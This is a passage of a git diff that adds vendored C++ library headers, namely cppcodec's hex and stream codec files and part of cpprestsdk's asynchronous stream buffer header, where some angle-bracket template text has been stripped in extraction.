noexcept + { + return true ? 0 : throw std::domain_error("invalid last encoding symbol index in a tail"); + } + + template + static void decode_block(Result& decoded, ResultState&, const uint8_t* idx); + + template + static void decode_tail(Result& decoded, ResultState&, const uint8_t* idx, size_t idx_len); +}; + + +template +template +inline void hex::decode_block(Result& decoded, ResultState& state, const uint8_t* idx) +{ + data::put(decoded, state, static_cast((idx[0] << 4) | idx[1])); +} + +template +template +inline void hex::decode_tail(Result&, ResultState&, const uint8_t*, size_t) +{ + throw invalid_input_length( + "odd-length hex input is not supported by the streaming octet decoder, " + "use a place-based number decoder instead"); +} + +} // namespace detail +} // namespace cppcodec + +#endif // CPPCODEC_DETAIL_HEX diff --git a/Src/Common/CppCodec/detail/stream_codec.hpp b/Src/Common/CppCodec/detail/stream_codec.hpp new file mode 100644 index 0000000..4a6cfde --- /dev/null +++ b/Src/Common/CppCodec/detail/stream_codec.hpp @@ -0,0 +1,247 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_DETAIL_STREAM_CODEC +#define CPPCODEC_DETAIL_STREAM_CODEC + +#include // for abort() +#include + +#include "../parse_error.hpp" +#include "config.hpp" + +namespace cppcodec { +namespace detail { + +template +class stream_codec +{ +public: + template static void encode( + Result& encoded_result, ResultState&, const uint8_t* binary, size_t binary_size); + + template static void decode( + Result& binary_result, ResultState&, const char* encoded, size_t encoded_size); + + static constexpr size_t encoded_size(size_t binary_size) noexcept; + static constexpr size_t decoded_max_size(size_t encoded_size) noexcept; +}; + +template // default for CodecVariant::generates_padding() == false +struct padder { + template + CPPCODEC_ALWAYS_INLINE void operator()(Result&, ResultState&, EncodedBlockSizeT) { } +}; + +template<> // specialization for CodecVariant::generates_padding() == true +struct padder { + template + CPPCODEC_ALWAYS_INLINE void operator()( + Result& encoded, ResultState& state, EncodedBlockSizeT num_padding_characters) + { + for (EncodedBlockSizeT i = 0; i < num_padding_characters; ++i) { + data::put(encoded, state, CodecVariant::padding_symbol()); + } + } +}; + +template +struct enc { + // Block encoding: Go from 0 to (block size - 1), append a symbol for each iteration unconditionally. + template + static CPPCODEC_ALWAYS_INLINE void block(Result& encoded, ResultState& state, const uint8_t* src) + { + using EncodedBlockSizeT = decltype(Codec::encoded_block_size()); + constexpr static const EncodedBlockSizeT SymbolIndex = static_cast(I - 1); + + enc().template block(encoded, state, src); + data::put(encoded, state, CodecVariant::symbol(Codec::template index(src))); + } + + // Tail encoding: Go from 0 until (runtime) num_symbols, append a symbol for each iteration. + template + static CPPCODEC_ALWAYS_INLINE void tail( + Result& encoded, ResultState& state, const uint8_t* src, EncodedBlockSizeT num_symbols) + { + constexpr static const EncodedBlockSizeT SymbolIndex = Codec::encoded_block_size() - I; + constexpr static const EncodedBlockSizeT NumSymbols = SymbolIndex + static_cast(1); + + if (num_symbols == NumSymbols) { + data::put(encoded, state, CodecVariant::symbol(Codec::template index_last(src))); + padder pad; +#ifdef _MSC_VER + pad.operator()(encoded, state, Codec::encoded_block_size() - NumSymbols); +#else + pad.template operator()(encoded, state, Codec::encoded_block_size() - NumSymbols); +#endif + return; + } + data::put(encoded, state, CodecVariant::symbol(Codec::template index(src))); + enc().template tail(encoded, state, src, num_symbols); + } +}; + +template<> // terminating specialization +struct enc<0> { + + template + static CPPCODEC_ALWAYS_INLINE void block(Result&, ResultState&, const uint8_t*) { } + + template + static CPPCODEC_ALWAYS_INLINE void tail(Result&, ResultState&, const uint8_t*, EncodedBlockSizeT) + { + abort(); // Not reached: block() should be called if num_symbols == block size, not tail(). + } +}; + +template +template +inline void stream_codec::encode( + Result& encoded_result, ResultState& state, + const uint8_t* src, size_t src_size) +{ + using encoder = enc; + + const uint8_t* src_end = src + src_size; + + if (src_size >= Codec::binary_block_size()) { + src_end -= Codec::binary_block_size(); + + for (; src <= src_end; src += Codec::binary_block_size()) { + encoder::template block(encoded_result, state, src); + } + src_end += Codec::binary_block_size(); + } + + if (src_end > src) { + auto remaining_src_len = src_end - src; + if (!remaining_src_len || remaining_src_len >= Codec::binary_block_size()) { + abort(); + return; + } + auto num_symbols = Codec::num_encoded_tail_symbols(static_cast(remaining_src_len)); + encoder::template tail(encoded_result, state, src, num_symbols); + } +} + +template +template +inline void stream_codec::decode( + Result& binary_result, ResultState& state, + const char* src_encoded, size_t src_size) +{ + const char* src = src_encoded; + const char* src_end = src + src_size; + + uint8_t idx[Codec::encoded_block_size()] = {}; + uint8_t last_value_idx = 0; + + while (src < src_end) { + if (CodecVariant::should_ignore(idx[last_value_idx] = CodecVariant::index_of(*(src++)))) { + continue; + } + if (CodecVariant::is_special_character(idx[last_value_idx])) { + break; + } + + ++last_value_idx; + if (last_value_idx == Codec::encoded_block_size()) { + Codec::decode_block(binary_result, state, idx); + last_value_idx = 0; + } + } + + uint8_t last_idx = last_value_idx; + if (CodecVariant::is_padding_symbol(idx[last_value_idx])) { + if (!last_value_idx) { + // Don't accept padding at the start of a block. + // The encoder should have omitted that padding altogether. + throw padding_error(); + } + // We're in here because we just read a (first) padding character. Try to read more. + ++last_idx; + while (src < src_end) { + // Use idx[last_value_idx] to avoid declaring another uint8_t. It's unused now so that's okay. + if (CodecVariant::is_eof(idx[last_value_idx] = CodecVariant::index_of(*(src++)))) { + break; + } + if (!CodecVariant::is_padding_symbol(idx[last_value_idx])) { + throw padding_error(); + } + + ++last_idx; + if (last_idx > Codec::encoded_block_size()) { + throw padding_error(); + } + } + } + + if (last_idx) { + if (CodecVariant::requires_padding() && last_idx != Codec::encoded_block_size()) { + // If the input is not a multiple of the block size then the input is incorrect. + throw padding_error(); + } + if (last_value_idx >= Codec::encoded_block_size()) { + abort(); + return; + } + Codec::decode_tail(binary_result, state, idx, last_value_idx); + } +} + +template +inline constexpr size_t stream_codec::encoded_size(size_t binary_size) noexcept +{ + using C = Codec; + + // constexpr rules make this a lot harder to read than it actually is. + return CodecVariant::generates_padding() + // With padding, the encoded size is a multiple of the encoded block size. + // To calculate that, round the binary size up to multiple of the binary block size, + // then convert to encoded by multiplying with { base32: 8/5, base64: 4/3 }. + ? (binary_size + (C::binary_block_size() - 1) + - ((binary_size + (C::binary_block_size() - 1)) % C::binary_block_size())) + * C::encoded_block_size() / C::binary_block_size() + // No padding: only pad to the next multiple of 5 bits, i.e. at most a single extra byte. + : (binary_size * C::encoded_block_size() / C::binary_block_size()) + + (((binary_size * C::encoded_block_size()) % C::binary_block_size()) ? 1 : 0); +} + +template +inline constexpr size_t stream_codec::decoded_max_size(size_t encoded_size) noexcept +{ + using C = Codec; + + return CodecVariant::requires_padding() + ? (encoded_size / C::encoded_block_size() * C::binary_block_size()) + : (encoded_size / C::encoded_block_size() * C::binary_block_size()) + + ((encoded_size % C::encoded_block_size()) + * C::binary_block_size() / C::encoded_block_size()); +} + +} // namespace detail +} // namespace cppcodec + +#endif // CPPCODEC_DETAIL_STREAM_CODEC diff --git a/Src/Common/CppCodec/hex_default_lower.hpp b/Src/Common/CppCodec/hex_default_lower.hpp new file mode 100644 index 0000000..3b10675 --- /dev/null +++ b/Src/Common/CppCodec/hex_default_lower.hpp @@ -0,0 +1,31 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_HEX_DEFAULT_LOWER +#define CPPCODEC_HEX_DEFAULT_LOWER + +#include "hex_lower.hpp" + +using hex = cppcodec::hex_lower; + +#endif // CPPCODEC_HEX_DEFAULT_LOWER diff --git a/Src/Common/CppCodec/hex_default_upper.hpp b/Src/Common/CppCodec/hex_default_upper.hpp new file mode 100644 index 0000000..a960f02 --- /dev/null +++ b/Src/Common/CppCodec/hex_default_upper.hpp @@ -0,0 +1,31 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_HEX_DEFAULT_UPPER +#define CPPCODEC_HEX_DEFAULT_UPPER + +#include "hex_upper.hpp" + +using hex = cppcodec::hex_upper; + +#endif // CPPCODEC_HEX_DEFAULT_UPPER diff --git a/Src/Common/CppCodec/hex_lower.hpp b/Src/Common/CppCodec/hex_lower.hpp new file mode 100644 index 0000000..6c6b113 --- /dev/null +++ b/Src/Common/CppCodec/hex_lower.hpp @@ -0,0 +1,57 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_HEX_LOWER +#define CPPCODEC_HEX_LOWER + +#include "detail/codec.hpp" +#include "detail/hex.hpp" + +namespace cppcodec { + +namespace detail { + +static constexpr const char hex_lower_alphabet[] = { + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', // at index 10 + 'a', 'b', 'c', 'd', 'e', 'f' +}; +static_assert(sizeof(hex_lower_alphabet) == 16, "hex alphabet must have 16 values"); + +class hex_lower : public hex_base +{ +public: + template using codec_impl = stream_codec; + + static inline constexpr char symbol(uint8_t index) + { + return hex_lower_alphabet[index]; + } +}; + +} // namespace detail + +using hex_lower = detail::codec>; + +} // namespace cppcodec + +#endif // CPPCODEC_HEX_LOWER diff --git a/Src/Common/CppCodec/hex_upper.hpp b/Src/Common/CppCodec/hex_upper.hpp new file mode 100644 index 0000000..4a70ca9 --- /dev/null +++ b/Src/Common/CppCodec/hex_upper.hpp @@ -0,0 +1,57 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_HEX_UPPER +#define CPPCODEC_HEX_UPPER + +#include "detail/codec.hpp" +#include "detail/hex.hpp" + +namespace cppcodec { + +namespace detail { + +static constexpr const char hex_upper_alphabet[] = { + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', + 'A', 'B', 'C', 'D', 'E', 'F' +}; +static_assert(sizeof(hex_upper_alphabet) == 16, "hex alphabet must have 16 values"); + +class hex_upper : public hex_base +{ +public: + template using codec_impl = stream_codec; + + static inline constexpr char symbol(uint8_t index) + { + return hex_upper_alphabet[index]; + } +}; + +} // namespace detail + +using hex_upper = detail::codec>; + +} // namespace cppcodec + +#endif // CPPCODEC_HEX_UPPER diff --git a/Src/Common/CppCodec/parse_error.hpp b/Src/Common/CppCodec/parse_error.hpp new file mode 100644 index 0000000..97438ad --- /dev/null +++ b/Src/Common/CppCodec/parse_error.hpp @@ -0,0 +1,109 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_PARSE_ERROR +#define CPPCODEC_PARSE_ERROR + +#include +#include + +namespace cppcodec { + +namespace detail { +// <*stream> headers include a lot of code and noticeably increase compile times. +// The only thing we want from them really is a char-to-string conversion. +// That's easy to implement with many less lines of code, so let's do it ourselves. +template +static void uctoa(unsigned char n, char (&s)[N]) +{ + static_assert(N >= 4, "need at least 4 bytes to convert an unsigned char to string safely"); + int i = sizeof(s) - 1; + int num_chars = 1; + s[i--] = '\0'; + do { // generate digits in reverse order + s[i--] = n % 10 + '0'; // get next digit + ++num_chars; + } while ((n /= 10) > 0); // delete it + + if (num_chars == sizeof(s)) { + return; + } + for (i = 0; i < num_chars; ++i) { // move chars to front of string + s[i] = s[i + (sizeof(s) - num_chars)]; + } +} +} // end namespace detail + + +class parse_error : public std::domain_error +{ +public: + using std::domain_error::domain_error; +}; + +// Avoids memory allocation, so it can be used in constexpr functions. +class symbol_error : public parse_error +{ +public: + symbol_error(char c) + : parse_error(symbol_error::make_error_message(c)) + , m_symbol(c) + { + } + + symbol_error(const symbol_error&) = default; + + char symbol() const noexcept { return m_symbol; } + +private: + static std::string make_error_message(char c) + { + char s[4]; + detail::uctoa(*reinterpret_cast(&c), s); + return std::string("parse error: character [") + &(s[0]) + " '" + c + "'] out of bounds"; + } + +private: + char m_symbol; +}; + +class invalid_input_length : public parse_error +{ +public: + using parse_error::parse_error; +}; + +class padding_error : public invalid_input_length +{ +public: + padding_error() + : invalid_input_length("parse error: codec expects padded input string but padding was invalid") + { + } + + padding_error(const padding_error&) = default; +}; + +} // namespace cppcodec + +#endif // CPPCODEC_PARSE_ERROR diff --git a/Src/Common/CppRestSdk/include/cpprest/astreambuf.h b/Src/Common/CppRestSdk/include/cpprest/astreambuf.h new file mode 100644 index 0000000..16d3688 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/astreambuf.h @@ -0,0 +1,1180 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Asynchronous I/O: stream buffer. This is an extension to the PPL concurrency features and therefore + * lives in the Concurrency namespace. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#include "Common/CppRestSdk/include/cpprest/asyncrt_utils.h" +#include "Common/CppRestSdk/include/cpprest/details/basic_types.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include +#include +#include +#include +#include + +#if (defined(_MSC_VER) && (_MSC_VER >= 1800)) && !CPPREST_FORCE_PPLX +namespace Concurrency // since namespace pplx = Concurrency +#else +namespace pplx +#endif +{ +namespace details +{ +template +pplx::task _do_while(F func) +{ + pplx::task first = func(); + return first.then([=](bool guard) -> pplx::task { + if (guard) + return pplx::details::_do_while(func); + else + return first; + }); +} +} // namespace details +} + +namespace Concurrency +{ +/// Library for asynchronous streams. +namespace streams +{ +/// +/// Extending the standard char_traits type with one that adds values and types +/// that are unique to "C++ REST SDK" streams. +/// +/// +/// The data type of the basic element of the stream. +/// +template +struct char_traits : std::char_traits<_CharType> +{ + /// + /// Some synchronous functions will return this value if the operation + /// requires an asynchronous call in a given situation. + /// + /// An int_type value which implies that an asynchronous call is required. + static typename std::char_traits<_CharType>::int_type requires_async() + { + return std::char_traits<_CharType>::eof() - 1; + } +}; +#if !defined(_WIN32) +template<> +struct char_traits : private std::char_traits +{ +public: + typedef unsigned char char_type; + + using std::char_traits::eof; + using std::char_traits::int_type; + using std::char_traits::off_type; + using std::char_traits::pos_type; + + static size_t length(const unsigned char* str) + { + return std::char_traits::length(reinterpret_cast(str)); + } + + static void assign(unsigned char& left, const unsigned char& right) { left = right; } + static unsigned char* assign(unsigned char* left, size_t n, unsigned char value) + { + return reinterpret_cast( + std::char_traits::assign(reinterpret_cast(left), n, static_cast(value))); + } + + static unsigned char* copy(unsigned char* left, const unsigned char* right, size_t n) + { + return reinterpret_cast( + std::char_traits::copy(reinterpret_cast(left), reinterpret_cast(right), n)); + } + + static unsigned char* move(unsigned char* left, const unsigned char* right, size_t n) + { + return reinterpret_cast( + std::char_traits::move(reinterpret_cast(left), reinterpret_cast(right), n)); + } + + static int_type requires_async() { return eof() - 1; } +}; +#endif + +namespace details +{ +/// +/// Stream buffer base class. +/// +template +class basic_streambuf +{ +public: + typedef _CharType char_type; + typedef ::concurrency::streams::char_traits<_CharType> traits; + + typedef typename traits::int_type int_type; + typedef typename traits::pos_type pos_type; + typedef typename traits::off_type off_type; + + /// + /// Virtual constructor for stream buffers. + /// + virtual ~basic_streambuf() {} + + /// + /// can_read is used to determine whether a stream buffer will support read operations (get). + /// + virtual bool can_read() const = 0; + + /// + /// can_write is used to determine whether a stream buffer will support write operations (put). + /// + virtual bool can_write() const = 0; + + /// + /// can_seek is used to determine whether a stream buffer supports seeking. + /// + virtual bool can_seek() const = 0; + + /// + /// has_size is used to determine whether a stream buffer supports size(). + /// + virtual bool has_size() const = 0; + + /// + /// is_eof is used to determine whether a read head has reached the end of the buffer. + /// + virtual bool is_eof() const = 0; + + /// + /// Gets the stream buffer size, if one has been set. + /// + /// The direction of buffering (in or out) + /// The size of the internal buffer (for the given direction). + /// An implementation that does not support buffering will always return 0. + virtual size_t buffer_size(std::ios_base::openmode direction = std::ios_base::in) const = 0; + + /// + /// Sets the stream buffer implementation to buffer or not buffer. + /// + /// The size to use for internal buffering, 0 if no buffering should be done. + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will silently ignore calls to this function and it + /// will not have any effect on what is returned by subsequent calls to . + virtual void set_buffer_size(size_t size, std::ios_base::openmode direction = std::ios_base::in) = 0; + + /// + /// For any input stream, in_avail returns the number of characters that are immediately available + /// to be consumed without blocking. May be used in conjunction with to read data without + /// incurring the overhead of using tasks. + /// + virtual size_t in_avail() const = 0; + + /// + /// Checks if the stream buffer is open. + /// + /// No separation is made between open for reading and open for writing. + virtual bool is_open() const = 0; + + /// + /// Closes the stream buffer, preventing further read or write operations. + /// + /// The I/O mode (in or out) to close for. + virtual pplx::task close(std::ios_base::openmode mode = (std::ios_base::in | std::ios_base::out)) = 0; + + /// + /// Closes the stream buffer with an exception. + /// + /// The I/O mode (in or out) to close for. + /// Pointer to the exception. + virtual pplx::task close(std::ios_base::openmode mode, std::exception_ptr eptr) = 0; + + /// + /// Writes a single character to the stream. + /// + /// The character to write + /// A task that holds the value of the character. This value is EOF if the write operation + /// fails. + virtual pplx::task putc(_CharType ch) = 0; + + /// + /// Writes a number of characters to the stream. + /// + /// A pointer to the block of data to be written. + /// The number of characters to write. + /// A task that holds the number of characters actually written, either 'count' or 0. + virtual pplx::task putn(const _CharType* ptr, size_t count) = 0; + + /// + /// Writes a number of characters to the stream. Note: callers must make sure the data to be written is valid until + /// the returned task completes. + /// + /// A pointer to the block of data to be written. + /// The number of characters to write. + /// A task that holds the number of characters actually written, either 'count' or 0. + virtual pplx::task putn_nocopy(const _CharType* ptr, size_t count) = 0; + + /// + /// Reads a single character from the stream and advances the read position. + /// + /// A task that holds the value of the character. This value is EOF if the read fails. + virtual pplx::task bumpc() = 0; + + /// + /// Reads a single character from the stream and advances the read position. + /// + /// The value of the character. -1 if the read fails. -2 if an asynchronous read is + /// required This is a synchronous operation, but is guaranteed to never block. + virtual int_type sbumpc() = 0; + + /// + /// Reads a single character from the stream without advancing the read position. + /// + /// A task that holds the value of the byte. This value is EOF if the read fails. + virtual pplx::task getc() = 0; + + /// + /// Reads a single character from the stream without advancing the read position. + /// + /// The value of the character. EOF if the read fails. if an + /// asynchronous read is required This is a synchronous operation, but is guaranteed to never + /// block. + virtual int_type sgetc() = 0; + + /// + /// Advances the read position, then returns the next character without advancing again. + /// + /// A task that holds the value of the character. This value is EOF if the read fails. + virtual pplx::task nextc() = 0; + + /// + /// Retreats the read position, then returns the current character without advancing. + /// + /// A task that holds the value of the character. This value is EOF if the read fails, + /// requires_async if an asynchronous read is required + virtual pplx::task ungetc() = 0; + + /// + /// Reads up to a given number of characters from the stream. + /// + /// The address of the target memory area. + /// The maximum number of characters to read. + /// A task that holds the number of characters read. This value is O if the end of the stream is + /// reached. + virtual pplx::task getn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) = 0; + + /// + /// Copies up to a given number of characters from the stream, synchronously. + /// + /// The address of the target memory area. + /// The maximum number of characters to read. + /// The number of characters copied. O if the end of the stream is reached or an asynchronous read is + /// required. This is a synchronous operation, but is guaranteed to never block. + virtual size_t scopy(_Out_writes_(count) _CharType* ptr, _In_ size_t count) = 0; + + /// + /// Gets the current read or write position in the stream. + /// + /// The I/O direction to seek (see remarks) + /// The current position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the direction parameter defines whether to move the read or the write + /// cursor. + virtual pos_type getpos(std::ios_base::openmode direction) const = 0; + + /// + /// Gets the size of the stream, if known. Calls to has_size will determine whether + /// the result of size can be relied on. + /// + virtual utility::size64_t size() const = 0; + + /// + /// Seeks to the given position. + /// + /// The offset from the beginning of the stream. + /// The I/O direction to seek (see remarks). + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. For such streams, the direction parameter + /// defines whether to move the read or the write cursor. + virtual pos_type seekpos(pos_type pos, std::ios_base::openmode direction) = 0; + + /// + /// Seeks to a position given by a relative offset. + /// + /// The relative position to seek to + /// The starting point (beginning, end, current) for the seek. + /// The I/O direction to seek (see remarks) + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the mode parameter defines whether to move the read or the write cursor. + virtual pos_type seekoff(off_type offset, std::ios_base::seekdir way, std::ios_base::openmode mode) = 0; + + /// + /// For output streams, flush any internally buffered data to the underlying medium. + /// + /// A task that returns true if the sync succeeds, false if not. + virtual pplx::task sync() = 0; + + // + // Efficient read and write. + // + // The following routines are intended to be used for more efficient, copy-free, reading and + // writing of data from/to the stream. Rather than having the caller provide a buffer into which + // data is written or from which it is read, the stream buffer provides a pointer directly to the + // internal data blocks that it is using. Since not all stream buffers use internal data structures + // to copy data, the functions may not be supported by all. An application that wishes to use this + // functionality should therefore first try them and check for failure to support. If there is + // such failure, the application should fall back on the copying interfaces (putn / getn) + // + + /// + /// Allocates a contiguous memory block and returns it. + /// + /// The number of characters to allocate. + /// A pointer to a block to write to, null if the stream buffer implementation does not support + /// alloc/commit. + virtual _CharType* alloc(_In_ size_t count) = 0; + + /// + /// Submits a block already allocated by the stream buffer. + /// + /// The number of characters to be committed. + virtual void commit(_In_ size_t count) = 0; + + /// + /// Gets a pointer to the next already allocated contiguous block of data. + /// + /// A reference to a pointer variable that will hold the address of the block on success. + /// The number of contiguous characters available at the address in 'ptr'. + /// true if the operation succeeded, false otherwise. + /// + /// A return of false does not necessarily indicate that a subsequent read operation would fail, only that + /// there is no block to return immediately or that the stream buffer does not support the operation. + /// The stream buffer may not de-allocate the block until is called. + /// If the end of the stream is reached, the function will return true, a null pointer, and a count of zero; + /// a subsequent read will not succeed. + /// + virtual bool acquire(_Out_ _CharType*& ptr, _Out_ size_t& count) = 0; + + /// + /// Releases a block of data acquired using . This frees the stream buffer to + /// de-allocate the memory, if it so desires. Move the read position ahead by the count. + /// + /// A pointer to the block of data to be released. + /// The number of characters that were read. + virtual void release(_Out_writes_(count) _CharType* ptr, _In_ size_t count) = 0; + + /// + /// Retrieves the stream buffer exception_ptr if it has been set. + /// + /// Pointer to the exception, if it has been set; otherwise, nullptr will be returned + virtual std::exception_ptr exception() const = 0; +}; + +template +class streambuf_state_manager : public basic_streambuf<_CharType>, + public std::enable_shared_from_this> +{ +public: + typedef typename details::basic_streambuf<_CharType>::traits traits; + typedef typename details::basic_streambuf<_CharType>::int_type int_type; + typedef typename details::basic_streambuf<_CharType>::pos_type pos_type; + typedef typename details::basic_streambuf<_CharType>::off_type off_type; + + /// + /// can_read is used to determine whether a stream buffer will support read operations (get). + /// + virtual bool can_read() const { return m_stream_can_read; } + + /// + /// can_write is used to determine whether a stream buffer will support write operations (put). + /// + virtual bool can_write() const { return m_stream_can_write; } + + /// + /// Checks if the stream buffer is open. + /// + /// No separation is made between open for reading and open for writing. + virtual bool is_open() const { return can_read() || can_write(); } + + /// + /// Closes the stream buffer, preventing further read or write operations. + /// + /// The I/O mode (in or out) to close for. + virtual pplx::task close(std::ios_base::openmode mode = std::ios_base::in | std::ios_base::out) + { + pplx::task closeOp = pplx::task_from_result(); + + if (mode & std::ios_base::in && can_read()) + { + closeOp = _close_read(); + } + + // After the flush_internal task completed, "this" object may have been destroyed, + // accessing the members is invalid, use shared_from_this to avoid access violation exception. + auto this_ptr = std::static_pointer_cast(this->shared_from_this()); + + if (mode & std::ios_base::out && can_write()) + { + if (closeOp.is_done()) + closeOp = closeOp && _close_write().then([this_ptr] {}); // passing down exceptions from closeOp + else + closeOp = closeOp.then([this_ptr] { return this_ptr->_close_write().then([this_ptr] {}); }); + } + + return closeOp; + } + + /// + /// Closes the stream buffer with an exception. + /// + /// The I/O mode (in or out) to close for. + /// Pointer to the exception. + virtual pplx::task close(std::ios_base::openmode mode, std::exception_ptr eptr) + { + if 